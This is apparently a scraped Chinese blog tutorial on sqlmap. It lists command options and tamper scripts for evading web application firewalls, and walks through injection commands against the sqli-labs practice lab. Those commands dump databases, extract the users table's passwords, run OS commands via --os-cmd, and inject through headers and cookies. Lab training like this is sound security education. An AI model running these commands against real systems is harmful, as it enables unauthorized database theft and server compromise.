-u 指定目标URL (可以是http协议也可以是https协议)
-d 连接数据库
--dbs 列出所有的数据库
--current-db 列出当前数据库
--tables 列出当前的表
--columns 列出当前的列
-D 选择使用哪个数据库
-T 选择使用哪个表
-C 选择使用哪个列
--dump 获取字段中的数据
--batch 自动选择yes
--smart 启发式快速判断,节约浪费时间
--forms 尝试使用post注入
-r 加载文件中的HTTP请求(本地保存的请求包txt文件)
-l 加载文件中的HTTP请求(本地保存的请求包日志文件)
-g 自动获取Google搜索的前一百个结果,对有GET参数的URL测试
-o 开启所有默认性能优化
--tamper 调用脚本进行注入
-v 指定sqlmap的回显等级
--delay 设置多久访问一次
--os-shell 获取主机shell,一般不太好用,因为没权限
-m 批量操作
-c 指定配置文件,会按照该配置文件执行动作
-data data指定的数据会当做post数据提交
-timeout 设定超时时间
-level 设置注入探测等级
--risk 风险等级
--identify-waf 检测防火墙类型
--param-del="分割符" 设置参数的分割符
--skip-urlencode 不进行url编码
--keep-alive 设置持久连接,加快探测速度
--null-connection 检索没有body响应的内容,多用于盲注
--thread 最大为10 设置多线程
 
--delay
有些web服务器请求访问太过频繁可能会被防火墙拦截,使用--delay就可以设定两次http请求的延时

--safe-url
有的web服务器会在多次错误的访问请求后屏蔽所有请求,使用--safe-url 就可以每隔一段时间去访问一个正常的页面。
 
--tamper
语法:--tamper ["脚本名称"]
当调用多个脚本的时候,脚本之间用逗号隔开,调用的脚本在 sqlmap文件夹下的 tamper 文件夹中

脚本信息

apostrophemask.py              用UTF-8全角字符替换单引号字符

apostrophenullencode.py        用非法双字节unicode字符替换单引号字符

appendnullbyte.py              在payload末尾添加空字符编码

base64encode.py                对给定的payload全部字符使用Base64编码

between.py                     分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=”

bluecoat.py                    在SQL语句之后用有效的随机空白符替换空格符,随后用“LIKE”替换等于号“=”

chardoubleencode.py            对给定的payload全部字符使用双重URL编码(不处理已经编码的字符)

charencode.py                  对给定的payload全部字符使用URL编码(不处理已经编码的字符)

charunicodeencode.py           对给定的payload的非编码字符使用Unicode URL编码(不处理已经编码的字符)

concat2concatws.py            用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例

equaltolike.py                用“LIKE”运算符替换全部等于号“=”

greatest.py                   用“GREATEST”函数替换大于号“>”

halfversionedmorekeywords.py  在每个关键字之前添加MySQL注释

ifnull2ifisnull.py            用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例

lowercase.py                  用小写值替换每个关键字字符

modsecurityversioned.py       用注释包围完整的查询

modsecurityzeroversioned.py   用当中带有数字零的注释包围完整的查询

multiplespaces.py             在SQL关键字周围添加多个空格

nonrecursivereplacement.py    用representations替换预定义SQL关键字,适用于过滤器

overlongutf8.py               转换给定的payload当中的所有字符

percentage.py                 在每个字符之前添加一个百分号

randomcase.py                 随机转换每个关键字字符的大小写

randomcomments.py             向SQL关键字中插入随机注释

securesphere.py               添加经过特殊构造的字符串

sp_password.py                向payload末尾添加“sp_password” for automatic obfuscation from DBMS logs

space2comment.py              用“/**/”替换空格符

space2dash.py                 用破折号注释符“--”其次是一个随机字符串和一个换行符替换空格符

space2hash.py                 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符

space2morehash.py             用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符

space2mssqlblank.py           用一组有效的备选字符集当中的随机空白符替换空格符

space2mssqlhash.py            用磅注释符“#”其次是一个换行符替换空格符

space2mysqlblank.py           用一组有效的备选字符集当中的随机空白符替换空格符

space2mysqldash.py            用破折号注释符“--”其次是一个换行符替换空格符

space2plus.py                 用加号“+”替换空格符

space2randomblank.py          用一组有效的备选字符集当中的随机空白符替换空格符

unionalltounion.py            用“UNION SELECT”替换“UNION ALL SELECT”

unmagicquotes.py              用一个多字节组合%bf%27和末尾通用注释一起替换空格符 宽字节注入

varnish.py                    添加一个HTTP头“X-originating-IP”来绕过WAF

versionedkeywords.py          用MySQL注释包围每个非函数关键字

versionedmorekeywords.py      用MySQL注释包围每个关键字

xforwardedfor.py              添加一个伪造的HTTP头“X-Forwarded-For”来绕过WAF
-v ["x"]
使用sqlmap注入测试时,可以使用 -v [x] 参数来指定回显信息的复杂程度, x 的取值范围为[0~6]:
等级
解释
0
只显示python错误以及严重信息
1
同时显示基本信息和警告信息
2
同时显示debug信息
3
同时显示注入的pyload
4
同时显示HTTP请求
5
同时显示HTTP相应头
6
同时显示HTTP相应页面
 
--level
level有5个等级,默认等级为1,进行Cookie测试时使用--level 2 ,进行use-agent或refer测试时使用--level 3 ,进行 host 测试时使用--level 5
 
–-os-cmd=["命令"] 或 --os-shell=["命令"] 执行系统命令
利用sql-labs-less1测试 whoami 命令
sqlmap -u "http://192.168.0.6/sqli-labs-master/Less-1/?id=1" --os-cmd=whoami
选择web服务器支持的语言

选择web服务器的可写目录

[1] 使用默认的
[2] 自定义位置
[3] 自定义目录列表文件
[4] 暴力搜索

我在本地测试,节省时间,我选择2 ,自定义路径,然后把路径输入在下面

执行命令后的返回结果

以下关卡均可用get型的方法,常规注入

step1:sqlmap -u ["URL"] //测试是否存在注入

step2:sqlmap -u ["URL"] -current-db //查询当前数据库

step3:sqlmap -u ["URL"] -D ["数据库名"] --tables //查询当前数据库中的所有表

step4:sqlmap -u ["URL"] -D ["数据库名"] -T ["表名"] --columns //查询指定库中指定表的所有列(字段)

step5:sqlmap -u ["URL"] -D ["数据库名"] -T ["表名"] -C ["列名"] --dump //打印出指定库中指定表指定列中的字段内容
 
GET型
关卡
类型
sql-labs-less1
GET单引号字符型注入
sql-labs-less2
数字型注入
sql-labs-less3
有括号的单引号报错注入
sql-labs-less4
有括号的双引号报错注入
sql-labs-less5
单引号二次注入
sql-labs-less6
双引号二次注入
sql-labs-less7
文件导入导出
sql-labs-less8
布尔型盲注
sql-labs-less9
时间型盲注
sql-labs-less10
双引号时间盲注
 
sql注入检测
get型:
语法:sqlmap -u ["url"]
sqlmap -u http://192.168.0.6/sqli-labs-master/Less-1/?id=1

post型:

先使用bp把提交的数据包保存下来

或者直接

加上post提交的参数

语法:sqlmap -r ["请求包的txt文件"]

sqlmap -r "/root/.sqlmap/post.txt"

sql-labs -less1~sql-labs-less9

获取当前数据库名称:
语法:sqlmap -u [“url”] --current-db
sqlmap -u "http://192.168.0.6/sqli-labs-master/Less-1/?id=1" --current-db

获取指定数据库的表名:

语法:sqlmap -u [“url”] -D [‘数据库名’] --tables
sqlmap -u "192.168.0.6/sqli-labs-master/Less-1/?id=1" -D security --tables

获取指定数据库指定表中的字段:

语法:sqlmap -u [“url”] -D [‘数据库名’] -T[‘表名’] --columns
sqlmap -u "192.168.0.6/sqli-labs-master/Less-1/?id=1" -D security -T users --columns

获取指定数据库指定表的指定字段的字段内容:

语法:sqlmap -u [“url”] -D [‘数据库名’] -T [‘表名’] -C [‘字段名1,字段名2,…’] --dump
sqlmap -u "192.168.0.6/sqli-labs-master/Less-1/?id=1" -D security -T users -C password --dump

sql-labs-less10

sqlmap -u "http://192.168.0.6/sqli-labs-master/Less-10/?id=1" --current-db

提升等级 -level 2

sqlmap -u "http://192.168.0.6/sqli-labs-master/Less-10/?id=1" -level 2 --current-db

sql-labs-less11~less17常规 POST 注入

step1:sqlmap -r ["请求头文本"]  //测试是否存在注入

step2:sqlmap -r ["请求头文本"] --current-db //查询当前数据库

step3:sqlmap -r ["请求头文本"] -D ["数据库名"] --tables //查询当前数据库的所有表

step4:sqlmap -r ["请求头文本"] -D ["数据库名"] -T ["表名"] --columns //查询指定库指定表的所有列

step5:sqlmap -r ["请求头文本"] -D ["数据库名"] -T ["表名"] -C ["列名"] --dump //打印出指定库指定表指定列的所有字段内容
 
POST
关卡
类型
sql-labs-less11
基于错误的单引号字符型注入
sql-labs-less12
基于错误的双引号字符型注入
sql-labs-less13
单引号变形双注入
sql-labs-less14
双引号变形双注入
sql-labs-less15
Bool型时间延迟单引号盲注
sql-labs-less16
Bool型时间延迟双引号盲注
sql-labs-less17
更新查询注入
sql-labs-less18
Uagent注入
sql-labs-less19
Referer注入
sql-labs-less20
Cookie注入
 
 
 
sql-labs-less18
Header injection - Uagent
sqlmap 在对user-agent 注入的时候,得在文件中的user-agent的参数后面加上 *

或者不加 * 号,调用 --level参数,将等级调至 3级,只有等级为 3级即以上时才能对 user-agent进行注入

sqlmap -r "/root/.sqlmap/post.txt" -level 3

sql-labs-less19
Header injection - Referer
对Referer注入和User-agent相同,要么是在Referer后面加上 *

或者将 level 调至 3 级

sql-labs-less20
Header injection -Cookie
语法:sqlmap -u [“url”] --cookie ["cookie信息"] --level 2
sqlmap -u "http://192.168.0.6/sqli-labs-master/Less-20/index.php" --cookie "pma_lang=zh_CN;pma_mcrypt_iv=AoXpKxU5KcY%3D;pmaUser-1=7%2FwV%2BDOfbmI%3D;uname=admin;" --level 2

sqlmap使用教程(超详细)的更多相关文章

  1. exe电子书制作教程(超详细)【申明:来源于网络】

    exe电子书制作教程(超详细)[申明:来源于网络] 地址:http://wenku.baidu.com/view/0b046907eff9aef8941e0631.html

  2. MyCat安装与测试教程 超详细!

    MyCat安装与测试教程 超详细! MyCat基础知识 一.什么是MYCAT? 1. 一个彻底开源的,面向企业应用开发的大数据库集群 2. 支持事务.ACID.可以替代MySQL的加强版数据库 3. ...

  3. Python入门教程 超详细1小时学会Python

    Python入门教程 超详细1小时学会Python 作者: 字体:[增加 减小] 类型:转载 时间:2006-09-08我要评论 本文适合有经验的程序员尽快进入Python世界.特别地,如果你掌握Ja ...

  4. Python入门教程 超详细1小时学会Python

    Python入门教程 超详细1小时学会Python 本文适合有经验的程序员尽快进入Python世界.特别地,如果你掌握Java和Javascript,不用1小时你就可以用Python快速流畅地写有用的 ...

  5. sqlmap基础入门超详细教程

    前言: 总算进入了自己喜欢的行业. 要时刻记得当初自己说过的话, 不忘初心. Come on! 资料: 感谢超哥分享的干货..  sqlmap干货点击直达 学习环境: 本次学习使用的是kali集成的s ...

  6. SQLMap用户手册【超详细】

    http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,它会: 1.判断可注入的参数 2.判断可以用那种SQL注 ...

  7. windows环境下elasticsearch安装教程(超详细)

    一.安装jdk ElasticSearch是基于lucence开发的,也就是运行需要java jdk支持.所以要先安装JAVA环境. 由于ElasticSearch 5.x 往后依赖于JDK 1.8的 ...

  8. Docker实例教程[超详细](一)

    Docker Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化.容器是完全使用沙箱机制,相互 ...

  9. Python入门教程 超详细1小时学会Python(转)

    假设我们有这么一项任务:简单测试局域网中的电脑是否连通.这些电脑的ip范围从192.168.0.101到192.168.0.200. 思路:用shell编程.(Linux通常是bash而Windows ...

随机推荐

  1. Vuejs+elementUI项目,在进行打包时,要注意的问题

    注意:打包之前,需要注意修改一些地方 (1)若是前后端分离开发的,前端开发过程中可能会在api.js中设置访问路径为服务器所在电脑的ip:端口,打包前,最好将它改回localhost:8080 (2) ...

  2. 关于Euler-Poisson积分的几种解法

    来源:https://www.cnblogs.com/Renascence-5/p/5432211.html 方法1:因为积分值只与被积函数和积分域有关,与积分变量无关,所以\[I^{2}=\left ...

  3. eclipse新建web项目,并将其部署到tomcat

    参考链接:https://blog.csdn.net/smilehhq/article/details/78414672

  4. 关于Oracle内存分配-解决实际运行时最大Session数不一致远小于系统配置最大的Session数目

    一.相关的技术准备 1. 关于内存的介绍:https://blog.csdn.net/u013641333/article/details/82732526 2. PGA_AGGREGATE_TARG ...

  5. CSS基础之浮动属性float图文详解

      宏观地讲,我们的web页面的制作,是个“流”,必须从上而下,像“织毛衣”.   标准流里面的限制非常多,导致很多页面效果无法实现.如果我们现在就要并排.并且就要设置宽高,那该怎么办呢?办法是:超脱 ...

  6. 《 Java 编程思想》CH07 复用类

    复用代码是 Java 众多引人注目的功能之一. Java 可以通过创建类来复用代码,要在使用类的时候不破坏现有代码,有两种方式: 组合:在新的类中使用现有类的对象. 继承:按照现有类的类型来创建新类, ...

  7. AtCoder arc078_d Mole and Abandoned Mine

    洛谷题目页面传送门 & AtCoder题目页面传送门 给定一个无向连通带权图\(G=(V,E),|V|=n,|E|=m\)(节点从\(0\)开始编号),要删掉一些边使得节点\(0\)到\(n- ...

  8. 理解 nodeJS 中的 buffer,stream

    在Node.js开发中,当遇到 buffer,stream,和二进制数据处理时,你是否像我一样,总是感到困惑?这种感觉是否会让你认为不了解它们,以为它们不适合你,认为而这些是Node.js作者们的事情 ...

  9. 【Unity|C#】基础篇(10)——泛型(Generic)/ 泛型约束条件(where)

    [学习资料] <C#图解教程>(第17章):https://www.cnblogs.com/moonache/p/7687551.html 电子书下载:https://pan.baidu. ...

  10. liunx 中设置zookeeper 自启动(service zookeeper does not support chkconfig)

    在liunx 上设置zookeeper 自启动 1.进入目录 cd /etc/init.d 2.创建一个文件 vim zookeeper 3.编辑zookeepr 文件 连接liunx使用的软件是fi ...